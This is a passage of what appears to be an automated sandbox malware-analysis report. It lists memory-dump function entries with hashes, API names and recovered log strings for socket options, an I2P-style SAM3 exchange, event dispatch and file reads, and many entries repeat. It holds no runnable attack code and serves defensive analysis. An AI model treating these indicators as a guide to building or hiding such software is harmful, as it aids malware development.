                                                                                                                  • Opcode Fuzzy Hash: 7b795b1efa713698dddd8c652ee4b9cd6c6e1b3637f4f8b0fd21ab21002727b0
                                                                                                                  • Instruction Fuzzy Hash: 7DF02B61B0890286F3105B5BB8042BA6665FB84774F104279ED6D837B4DF7CDA4ACB00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                  • Opcode ID: a7b5a3e27d61408e24ef4262097601e5cd0ffd2068a5939ebe3b84e33d613beb
                                                                                                                  • Instruction ID: cb2a71b02602d0ab2c0e725a7831b0356faab133829673c196dbf2f364ce400f
                                                                                                                  • Opcode Fuzzy Hash: a7b5a3e27d61408e24ef4262097601e5cd0ffd2068a5939ebe3b84e33d613beb
                                                                                                                  • Instruction Fuzzy Hash: 6CF0F6A2B0C94286F7109BABAC006A76664EB84774F445271EE6D837F4DF3CD546C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                                                                                                  • API String ID: 1729277954-536111009
                                                                                                                  • Opcode ID: 4ad06e24566ab5c6bb557166195a17081ad8b158e8741c27b0cf817f8edb379d
                                                                                                                  • Instruction ID: 3726a9c535666e0533cdf7107f72d3e11260143f00712b0bb80ee15ef3cace5a
                                                                                                                  • Opcode Fuzzy Hash: 4ad06e24566ab5c6bb557166195a17081ad8b158e8741c27b0cf817f8edb379d
                                                                                                                  • Instruction Fuzzy Hash: 9AF0F675B1C94286F3109B57B8000766660BF86BB0F1082F7E92D837B0DE3CC40A8B00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetstrchr
                                                                                                                  • String ID: [D] (%s) -> %s$sam3_recv_rsp
                                                                                                                  • API String ID: 2564583029-4292814133
                                                                                                                  • Opcode ID: facf68638d95ea0b2cf81ef83f61a81e48f368a89084a7acc5880b6f7e308d59
                                                                                                                  • Instruction ID: ba38b4d93f060c460c7ed8b8fa6cd6947ffb4b57afcf54bbde628c09e1876170
                                                                                                                  • Opcode Fuzzy Hash: facf68638d95ea0b2cf81ef83f61a81e48f368a89084a7acc5880b6f7e308d59
                                                                                                                  • Instruction Fuzzy Hash: 2F21C012F0CE8681FA2559AB581437915425F63FB0F1943F3EE7D4B7E2DE2CA8429301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11BDA2F6
                                                                                                                  • ebus_dispatch, xrefs: 00007FFE11BDA2EF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                  • Opcode ID: ec7771e1e83ac3cc9bd1e3336a2124f394ccde0f83b3c0cf51d2ad677df23565
                                                                                                                  • Instruction ID: e49652d32307f993d978fa17f03f782b7bf2ff3765791be9011a2cc98e613fb0
                                                                                                                  • Opcode Fuzzy Hash: ec7771e1e83ac3cc9bd1e3336a2124f394ccde0f83b3c0cf51d2ad677df23565
                                                                                                                  • Instruction Fuzzy Hash: 58216F32A0CE82C1EB758F27E8809A96768FB54BA8F146175EA8D47774DF3CE941C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • ebus_dispatch, xrefs: 00007FFE1A52602F
                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE1A526036
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                  • Opcode ID: 9900ccb5ce75725bc87be564b36fd8d6d249f1f9900f237f57d57ab2336d1be5
                                                                                                                  • Instruction ID: 27152e25fedd3b812e8258a35652e388219d188561a636ed9370f0413c0acb50
                                                                                                                  • Opcode Fuzzy Hash: 9900ccb5ce75725bc87be564b36fd8d6d249f1f9900f237f57d57ab2336d1be5
                                                                                                                  • Instruction Fuzzy Hash: 4F210722B0CE42C1EB608F66E8801796361EB96FA4F1441B7DA5E87AA4DF2CD855C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11501336
                                                                                                                  • ebus_dispatch, xrefs: 00007FFE1150132F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                  • Opcode ID: c529b84dc2b56fb7c1f4eb8d0b1a959fd8424dc3c1dfaac34978ad256373d367
                                                                                                                  • Instruction ID: 676ea77eddc938206aca4b561e26fb39674ac842e36acd4752b8f978cc12b249
                                                                                                                  • Opcode Fuzzy Hash: c529b84dc2b56fb7c1f4eb8d0b1a959fd8424dc3c1dfaac34978ad256373d367
                                                                                                                  • Instruction Fuzzy Hash: FB215B72A09E4282EB21DF53F88016D7369FB44BA4B144175DA9D87AB8DF3CE892C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • ebus_dispatch, xrefs: 00007FFE11EC132F
                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11EC1336
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                  • Opcode ID: 7f831e8638b2e21ef89d0a88fef1dfe03948884cf0943f83d1e1e332d764cd1f
                                                                                                                  • Instruction ID: d1802466f999ca27a23f750e49e627106a8b5deefce7c3fd6ad3e9a0a0182231
                                                                                                                  • Opcode Fuzzy Hash: 7f831e8638b2e21ef89d0a88fef1dfe03948884cf0943f83d1e1e332d764cd1f
                                                                                                                  • Instruction Fuzzy Hash: 59215132A08E42C1EB14DF97EC4026A67A8FB45BA4F545275DA5D877B4DF3CE851C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
                                                                                                                  • Instruction ID: 3b8a6eea542fb34637ba83395c3bfe2693cefb54c7e0e495c7ad69bcb0cbdf93
                                                                                                                  • Opcode Fuzzy Hash: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
                                                                                                                  • Instruction Fuzzy Hash: 1CF05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
                                                                                                                  • Instruction ID: 4f32e111606aa669f2e2081493924a6fb41a9fc20d9554670fb8ebc1df17f07d
                                                                                                                  • Opcode Fuzzy Hash: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
                                                                                                                  • Instruction Fuzzy Hash: 81F05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
                                                                                                                  • Instruction ID: 4f92e826c88e93e41a2c67fa124d3c7b9877c9c340c0a30761b7323073741610
                                                                                                                  • Opcode Fuzzy Hash: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
                                                                                                                  • Instruction Fuzzy Hash: 1EF05E73B0964281FB52FF14B441BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
                                                                                                                  • Instruction ID: 0ba2e7c2a368dc47192e30272ed9ef75a11c50f5095c716f2e1eab9ddf7ac83d
                                                                                                                  • Opcode Fuzzy Hash: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
                                                                                                                  • Instruction Fuzzy Hash: 27F05E73B0964681FB52FF14B450BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
                                                                                                                  • Instruction ID: 4295d770f716c68aa56fcb040638fa6a4903ad00b568e54ce1404830b31cd558
                                                                                                                  • Opcode Fuzzy Hash: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
                                                                                                                  • Instruction Fuzzy Hash: 3EF05E73B0964281FB52FF14B440BBD96422F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
                                                                                                                  • Instruction ID: 3b8a6eea542fb34637ba83395c3bfe2693cefb54c7e0e495c7ad69bcb0cbdf93
                                                                                                                  • Opcode Fuzzy Hash: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
                                                                                                                  • Instruction Fuzzy Hash: 1CF05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
                                                                                                                  • Instruction ID: 4f32e111606aa669f2e2081493924a6fb41a9fc20d9554670fb8ebc1df17f07d
                                                                                                                  • Opcode Fuzzy Hash: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
                                                                                                                  • Instruction Fuzzy Hash: 81F05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
                                                                                                                  • Instruction ID: 4f92e826c88e93e41a2c67fa124d3c7b9877c9c340c0a30761b7323073741610
                                                                                                                  • Opcode Fuzzy Hash: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
                                                                                                                  • Instruction Fuzzy Hash: 1EF05E73B0964281FB52FF14B441BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
